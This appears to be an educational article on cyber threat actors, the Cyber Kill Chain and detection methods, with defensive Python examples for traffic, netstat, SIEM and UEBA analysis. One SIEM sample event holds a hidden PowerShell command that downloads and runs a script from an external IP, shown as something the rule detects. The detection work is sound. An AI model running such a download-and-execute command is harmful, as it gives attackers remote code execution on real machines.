A threat actor is an individual, group, or organization that deliberately conducts cyberattacks to exploit system vulnerabilities and achieve specific objectives.
Identifying these actors helps organizations anticipate threats and strengthen their overall security posture.
Did You Know? It's estimated that a hacker strikes every 39 seconds, adding up to over 2,200 attacks per day!
Why Identifying Threat Actors Matters
Targeted Defenses: Enables the development of targeted threat models based on specific attacker behaviors.
Better Investigations: Improves incident investigation and the accuracy of identifying who is responsible (attribution).
Resource Management: Helps prioritize security tools, training, and resources effectively.
Shared Intelligence: Encourages collaboration and threat intelligence sharing across different organizations.
Risk Management: Assists in meeting strict compliance and risk management requirements.
Types of Threat Actors
Threat actors exist in many forms. Identifying which type you are facing matters because each has different motives, methods, and preferred targets, and therefore calls for different defenses.
1. Cybercriminals
Cybercriminals conduct attacks mainly for financial gain. They operate individually or in highly organized groups, often using tools and services that make cybercrime highly scalable (like "Ransomware-as-a-Service").
Methods: They use ransomware, banking fraud, and data theft to generate profit.
Ecosystem: They operate through underground dark web markets to buy or sell stolen data.
Targets: They frequently exploit third-party services and supply chains to expand their reach to more victims.
Example: Ransomware groups like LockBit and Akira targeting organizations for massive cryptocurrency payments.
2. Nation-State Hackers (State-Sponsored)
Nation-state hackers are backed, funded, and trained by governments to conduct cyber operations for political, military, or economic advantages.
Motives: Long-term strategic goals, global cyber espionage, and large-scale intelligence gathering.
Methods: They use advanced, often custom tooling, including zero-day exploits, and maintain stealthy long-term access to victim networks. Because of this persistence they are commonly tracked as Advanced Persistent Threats (APTs).
Targets: Critical sectors such as energy grids, national defense, and telecommunications.
Example: Groups like APT28 (Fancy Bear) involved in sophisticated global cyber espionage activities.
3. Insider Threats
Insider threats come from individuals within an organization who misuse their authorized access. These threats can be intentional (malicious) or entirely accidental.
The Danger: They act with valid, trusted credentials from inside the network, so perimeter controls such as firewalls and email filtering never see an intrusion; only monitoring of what authorized users actually do can catch them.
Methods: Often involve data leaks due to human error, negligence, or exploiting internal systems and personal devices (BYOD).
Example: An employee accidentally mishandling confidential information, or intentionally downloading sensitive company data to a USB drive before quitting.
4. Hacktivists
Hacktivists use hacking as a tool to promote political, social, or environmental causes.
Goal: To create massive public awareness, protest policies, or embarrass targeted organizations.
Methods: Launching DDoS attacks, defacing public websites, or leaking confidential data to expose organizations.
Example: Groups targeting government or corporate websites during current events to protest controversial policies.
5. Cyber Terrorists
Cyber terrorists aim to create fear, panic, and large-scale physical or digital disruption.
Targets: Critical infrastructure and essential public services (power, healthcare, transportation).
Methods: Using highly destructive malware (like wipers) to cause the maximum amount of damage possible.
Example: Attempts to shut down a city's energy grid or manipulate emergency hospital systems to create public panic.
How Threat Actors Work: The Cyber Kill Chain
Cyber attacks rarely happen by accident. They follow a highly structured approach to successfully breach systems. One widely used model to understand this is the Lockheed Martin Cyber Kill Chain, which breaks down an attack into 7 distinct stages.
Reconnaissance: Attackers gather info about the target using public records (OSINT), social media, or network scanning tools to find entry points.
Weaponization: The attacker creates a malicious payload by combining software exploits with malware.
Delivery: The payload is delivered to the target via phishing emails, malicious attachments, or infected websites (drive-by downloads).
Exploitation: A vulnerability in the system is triggered, allowing the attacker to execute their malicious code and gain initial access.
Installation: Malware or hidden backdoors are installed to ensure the attacker can persistently return to the system later.
Command and Control (C2): The compromised system opens an outbound connection to the attacker's server, often disguised as ordinary web traffic, so the attacker can issue further instructions and control it remotely.
Actions on Objectives: Attackers finally achieve their goal: stealing data, encrypting files (ransomware), or disrupting services.
Note: Modern attackers often use legitimate, pre-installed system tools ("living-off-the-land") to avoid triggering antivirus alarms.
Real-World Examples of Threat Actor Groups
Commvault SaaS Platform Exploitation (2025): Attackers exploited a zero-day vulnerability (CVE-2025-3928) in the Commvault Metallic SaaS backup platform. They gained access to client secrets used for Microsoft 365 backups, prompting CISA to urge immediate credential rotation.
Oracle Cloud Breach by "rose87168" (2025): A hacker claimed to breach Oracle Cloud infrastructure affecting 6 million records and 140,000 tenants by exploiting CVE-2021-35587. While Oracle denied it, security firm CloudSEK validated the leaked data as plausible.
TA-ShadowCricket: A China-linked threat actor group active for over a decade. They target government and enterprise networks across the Asia-Pacific for extremely stealthy, long-term cyber-espionage.
Lazarus Group (with its financially focused subgroup tracked as APT38): A highly dangerous North Korean state-sponsored group. They are linked to the 2014 Sony Pictures hack, the 2017 global WannaCry ransomware outbreak, and the $81M Bangladesh Bank SWIFT heist. They rely heavily on spear-phishing and zero-day exploits.
Identifying & Detecting Threat Actors
Threat actors try to remain hidden, but certain "Indicators of Compromise" (IoCs) reveal their presence. Security teams use monitoring, analytics, and threat intelligence to detect attacks early.
1. Monitor Network Traffic
Large data transfers to unknown external servers, especially at odd hours, may indicate data theft (exfiltration).
Tools: Wireshark, Snort, Suricata.
Example: A company PC sending hundreds of megabytes to an unfamiliar external IP address at 3:00 AM is a strong indicator of malware or exfiltration and should be investigated, after ruling out legitimate scheduled jobs such as backups.
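The off-hours check described above, written out as detection logic over a constructed set of flow records (an added example for this article, not code from the original page). It assumes flows are already summarized as (timestamp, source, destination, bytes sent), treats only the RFC 1918 ranges as internal, and uses an arbitrary 500 MiB threshold and 08:00 to 18:59 business-hours window; all addresses and sizes are made up.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime

# Constructed flow records: (timestamp, source host, destination IP, bytes sent).
# Sample data for the example, not real traffic. External IPs use documentation ranges.
SAMPLE_FLOWS = [
    ("2025-03-10T09:15:00", "10.0.0.12", "10.0.0.5",         120_000),        # internal file share
    ("2025-03-10T14:02:00", "10.0.0.12", "198.51.100.20",  3_500_000),        # daytime web traffic
    ("2025-03-10T03:04:00", "10.0.0.12", "203.0.113.77", 950_000_000),        # 3 AM bulk upload
    ("2025-03-10T03:06:00", "10.0.0.12", "203.0.113.77", 800_000_000),
    ("2025-03-10T03:10:00", "10.0.0.40", "10.0.0.9",   2_000_000_000),        # nightly backup, internal
    ("2025-03-10T11:30:00", "10.0.0.41", "198.51.100.9", 600_000_000),        # large, but business hours
]

# Assumptions chosen for the example: what counts as internal, business hours, and the threshold.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
BUSINESS_HOURS = range(8, 19)
OFF_HOURS_THRESHOLD = 500 * 1024 * 1024  # 500 MiB to one external IP outside business hours


def is_external(ip):
    """True if the address is outside the RFC 1918 ranges (TEST-NET addresses count as external)."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_offhours_exfil(flows, threshold=OFF_HOURS_THRESHOLD):
    """Return (source, destination) pairs that moved more than `threshold` bytes
    to an external address while outside business hours."""
    totals = defaultdict(int)
    for ts, src, dst, nbytes in flows:
        hour = datetime.fromisoformat(ts).hour
        if hour in BUSINESS_HOURS or not is_external(dst):
            continue
        totals[(src, dst)] += nbytes
    return [
        {"src": src, "dst": dst, "bytes": total}
        for (src, dst), total in totals.items()
        if total >= threshold
    ]


if __name__ == "__main__":
    for alert in find_offhours_exfil(SAMPLE_FLOWS):
        print(f"ALERT: {alert['src']} sent {alert['bytes'] / 2**20:.0f} MiB to {alert['dst']} off-hours")
```

Only the 3 AM uploads from 10.0.0.12 to 203.0.113.77 are reported; the internal backup and the daytime transfer are ignored by the time and destination filters, which is the kind of tuning that keeps this rule from paging on every nightly job.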
2. Check Active Network Connections
The netstat command-line tool shows exactly who your computer is communicating with. Unusual or suspicious IP connections running in the background may indicate active backdoors.
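A script that triages netstat output the way an analyst would by hand, added here as an example and not part of the original article. It parses the column layout of Windows `netstat -ano`, joins each connection to a PID-to-image map as `tasklist` would supply it, and flags established connections to external addresses that either use an uncommon port or belong to a process that has no business talking to the internet. The netstat text, the process map, the allowlist of browsers and the choice of ports 80/443 as "common" are all constructed assumptions for the example.

```python
import ipaddress

# Constructed output in the layout of Windows `netstat -ano` (sample, not a real capture).
NETSTAT_OUTPUT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.12:49722        10.0.0.5:445           ESTABLISHED     4
  TCP    10.0.0.12:49810        198.51.100.20:443      ESTABLISHED     5120
  TCP    10.0.0.12:49911        203.0.113.77:4444      ESTABLISHED     7312
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       928
  UDP    0.0.0.0:5353           *:*                                    2204
"""

# Constructed PID-to-image map, as `tasklist` would provide (sample data).
PROCESS_BY_PID = {4: "System", 5120: "msedge.exe", 7312: "powershell.exe", 928: "svchost.exe", 2204: "svchost.exe"}

# Assumptions for the example: internal ranges, processes expected to reach the internet, common ports.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
EXPECTED_INTERNET_CLIENTS = {"msedge.exe", "chrome.exe", "firefox.exe"}
COMMON_PORTS = {80, 443}


def parse_netstat(text):
    """Parse `netstat -ano` lines into dicts; UDP rows have no State column."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue  # headers and blank lines
        if parts[0] == "TCP":
            proto, local, foreign, state, pid = parts[:5]
        else:
            proto, local, foreign, pid = parts[:4]
            state = ""
        host, _, port = foreign.rpartition(":")
        conns.append({"proto": proto, "local": local, "remote_host": host,
                      "remote_port": port, "state": state, "pid": int(pid)})
    return conns


def is_external(host):
    """True for routable, non-RFC1918 addresses; wildcards such as '*' are not external."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def suspicious_connections(text, process_by_pid):
    """Flag established external connections on uncommon ports or from unexpected processes."""
    findings = []
    for c in parse_netstat(text):
        if c["state"] != "ESTABLISHED" or not is_external(c["remote_host"]):
            continue
        image = process_by_pid.get(c["pid"], "<unknown>")
        port = int(c["remote_port"])
        reasons = []
        if port not in COMMON_PORTS:
            reasons.append(f"uncommon port {port}")
        if image not in EXPECTED_INTERNET_CLIENTS:
            reasons.append(f"unexpected process {image}")
        if reasons:
            findings.append({"remote": f"{c['remote_host']}:{port}", "pid": c["pid"],
                             "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_connections(NETSTAT_OUTPUT, PROCESS_BY_PID):
        print(f"PID {f['pid']} ({f['image']}) -> {f['remote']}: {', '.join(f['reasons'])}")
```

On the sample data the browser session to port 443 is left alone, while the PowerShell process holding a connection to an external host on port 4444 is reported for both reasons. On a live system the same join can be done with `netstat -anob` (which prints the image name itself, but needs administrator rights) or on Linux with `ss -tnp`.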
3. Analyze Logs with SIEM Tools
Logs capture every login, error, and system change. SIEM (Security Information and Event Management) tools aggregate these logs to spot patterns.
Tools: Splunk, ELK Stack.
Example: Detecting multiple failed logins in a row, unauthorized admin privilege changes, or Microsoft Word launching PowerShell (a classic sign of macro malware).
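The three SIEM patterns above, implemented as correlation rules over a constructed event stream (an added example, not the article's code and not any particular SIEM's rule syntax). Events are assumed to already be normalized into dicts with the fields shown, roughly what Windows Security and Sysmon records look like after parsing; the thresholds (5 failures in 60 seconds), the lists of Office applications, shells and privileged groups, and every hostname, user and address are assumptions for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed, normalized events (sample data, not real logs).
SAMPLE_EVENTS = [
    {"ts": "2025-03-10T08:00:01", "type": "logon_failure", "user": "jdoe", "src_ip": "10.0.0.77"},
    {"ts": "2025-03-10T08:00:03", "type": "logon_failure", "user": "jdoe", "src_ip": "10.0.0.77"},
    {"ts": "2025-03-10T08:00:05", "type": "logon_failure", "user": "jdoe", "src_ip": "10.0.0.77"},
    {"ts": "2025-03-10T08:00:06", "type": "logon_failure", "user": "jdoe", "src_ip": "10.0.0.77"},
    {"ts": "2025-03-10T08:00:08", "type": "logon_failure", "user": "jdoe", "src_ip": "10.0.0.77"},
    {"ts": "2025-03-10T09:12:40", "type": "logon_failure", "user": "asmith", "src_ip": "10.0.0.31"},
    {"ts": "2025-03-10T09:30:00", "type": "process_create", "host": "WS-12",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.77/a.ps1')\""},
    {"ts": "2025-03-10T09:31:00", "type": "process_create", "host": "WS-12",
     "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"ts": "2025-03-10T10:05:00", "type": "group_change", "host": "WS-12",
     "group": "Administrators", "member": "svc_backup", "actor": "jdoe"},
]

# Rule parameters (assumptions for the example).
FAILED_LOGON_THRESHOLD = 5
FAILED_LOGON_WINDOW = timedelta(seconds=60)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PRIVILEGED_GROUPS = {"administrators", "domain admins"}


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def correlate(events):
    """Run the three rules over events in time order and return (rule, subject, detail) alerts."""
    alerts = []
    recent_failures = defaultdict(deque)  # src_ip -> timestamps of failures inside the window
    already_fired = set()                 # one brute-force alert per source, not one per extra failure
    for e in sorted(events, key=lambda ev: ev["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        if e["type"] == "logon_failure":
            window = recent_failures[e["src_ip"]]
            window.append(ts)
            while window and ts - window[0] > FAILED_LOGON_WINDOW:
                window.popleft()      # sliding window: drop failures older than 60s
            if len(window) >= FAILED_LOGON_THRESHOLD and e["src_ip"] not in already_fired:
                already_fired.add(e["src_ip"])
                alerts.append(("brute_force", e["src_ip"],
                               f"{len(window)} failed logons within {FAILED_LOGON_WINDOW.seconds}s"))
        elif e["type"] == "process_create":
            parent, child = basename(e["parent_image"]), basename(e["image"])
            if parent in OFFICE_APPS and child in SHELLS:
                alerts.append(("office_spawned_shell", e["host"], f"{parent} -> {child}: {e['cmdline']}"))
        elif e["type"] == "group_change":
            if e["group"].lower() in PRIVILEGED_GROUPS:
                alerts.append(("privileged_group_change", e["host"],
                               f"{e['actor']} added {e['member']} to {e['group']}"))
    return alerts


if __name__ == "__main__":
    for rule, subject, detail in correlate(SAMPLE_EVENTS):
        print(f"[{rule}] {subject}: {detail}")
```

The parent/child rule is the one worth copying: it keys on the process tree rather than on file hashes, so it still fires when the macro payload changes. In a real deployment the Office and shell lists become allowlists tuned to the environment, since some line-of-business add-ins do legitimately spawn `cmd.exe`.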
4. Use Endpoint Detection and Response (EDR)
EDR is a behavior-based successor to traditional antivirus: instead of matching known file signatures, it records process, file, registry and network activity on each endpoint and evaluates it against known attacker techniques.
Tools: CrowdStrike, SentinelOne.
Example: EDR watches running programs and can block or isolate a host when it sees abnormal behavior, such as a script injecting code into another process's memory or reading the memory of the credential store (lsass.exe on Windows).
5. Monitor User Behavior (UEBA)
User and Entity Behavior Analytics (UEBA) tools map out how employees normally act, and sound the alarm when they deviate.
Example: An employee who normally logs in from New York suddenly logs into the network from a completely different country and accesses sensitive HR files they have never opened before.
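A minimal version of the baseline-and-deviation logic that UEBA tools apply, written for this article as an added example (it is not the article's code and not how any named product scores events). It assumes access events carry a user, a login country and a resource path, builds per-user baselines from history, then scores new events by whether the country or the top-level share is new for that user, weighting shares under `/hr/` and `/finance/` more heavily. Users, countries, paths, weights and the alert threshold are all constructed for the example.

```python
from collections import defaultdict

# Constructed history used to build the baseline (sample data, not real logs).
BASELINE_EVENTS = [
    {"user": "mlee",  "country": "US", "resource": "/finance/q1-report.xlsx"},
    {"user": "mlee",  "country": "US", "resource": "/finance/budget.xlsx"},
    {"user": "mlee",  "country": "US", "resource": "/finance/q2-report.xlsx"},
    {"user": "rkhan", "country": "US", "resource": "/hr/payroll.csv"},
    {"user": "rkhan", "country": "CA", "resource": "/hr/benefits.pdf"},
]

# Constructed new events to score against that baseline.
NEW_EVENTS = [
    {"user": "mlee",  "country": "US", "resource": "/finance/q3-report.xlsx"},  # routine
    {"user": "mlee",  "country": "RO", "resource": "/hr/payroll.csv"},          # new country, new sensitive share
    {"user": "rkhan", "country": "CA", "resource": "/hr/payroll.csv"},          # known country, known share
]

# Scoring weights and sensitive areas (assumptions for the example).
SENSITIVE_SHARES = {"/hr/", "/finance/"}
WEIGHT_NEW_COUNTRY = 50
WEIGHT_NEW_SENSITIVE_SHARE = 40
WEIGHT_NEW_OTHER_SHARE = 10


def top_share(path):
    """'/hr/payroll.csv' -> '/hr/'; a bare file name is returned unchanged."""
    parts = path.split("/")
    return f"/{parts[1]}/" if len(parts) > 2 else path


def build_baseline(events):
    """Per-user sets of countries seen and top-level shares touched."""
    baseline = defaultdict(lambda: {"countries": set(), "shares": set()})
    for e in events:
        profile = baseline[e["user"]]
        profile["countries"].add(e["country"])
        profile["shares"].add(top_share(e["resource"]))
    return baseline


def score_event(event, baseline):
    """Return (score, reasons) measuring how far the event departs from the user's baseline."""
    profile = baseline.get(event["user"])
    if profile is None:
        return 100, ["no baseline for user"]
    score, reasons = 0, []
    if event["country"] not in profile["countries"]:
        score += WEIGHT_NEW_COUNTRY
        reasons.append(f"login from new country {event['country']}")
    share = top_share(event["resource"])
    if share not in profile["shares"]:
        score += WEIGHT_NEW_SENSITIVE_SHARE if share in SENSITIVE_SHARES else WEIGHT_NEW_OTHER_SHARE
        reasons.append(f"first access to {share}")
    return score, reasons


def detect_anomalies(new_events, baseline, threshold=50):
    """Events whose score reaches the threshold, as (user, score, reasons)."""
    flagged = []
    for e in new_events:
        score, reasons = score_event(e, baseline)
        if score >= threshold:
            flagged.append((e["user"], score, reasons))
    return flagged


if __name__ == "__main__":
    profiles = build_baseline(BASELINE_EVENTS)
    for user, score, reasons in detect_anomalies(NEW_EVENTS, profiles):
        print(f"{user}: score {score}; " + "; ".join(reasons))
```

The second event for mlee scores 90 (new country plus first touch of the HR share) and is flagged, while rkhan's access from Canada scores zero because both the country and the share are already in that user's history. Real UEBA products add time-of-day, peer-group and volume features, but the structure, a learned per-entity profile and a scored deviation, is the same.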
Knowledge Check
According to the Cyber Kill Chain, in which stage does an attacker create a malicious payload by combining exploits with malware?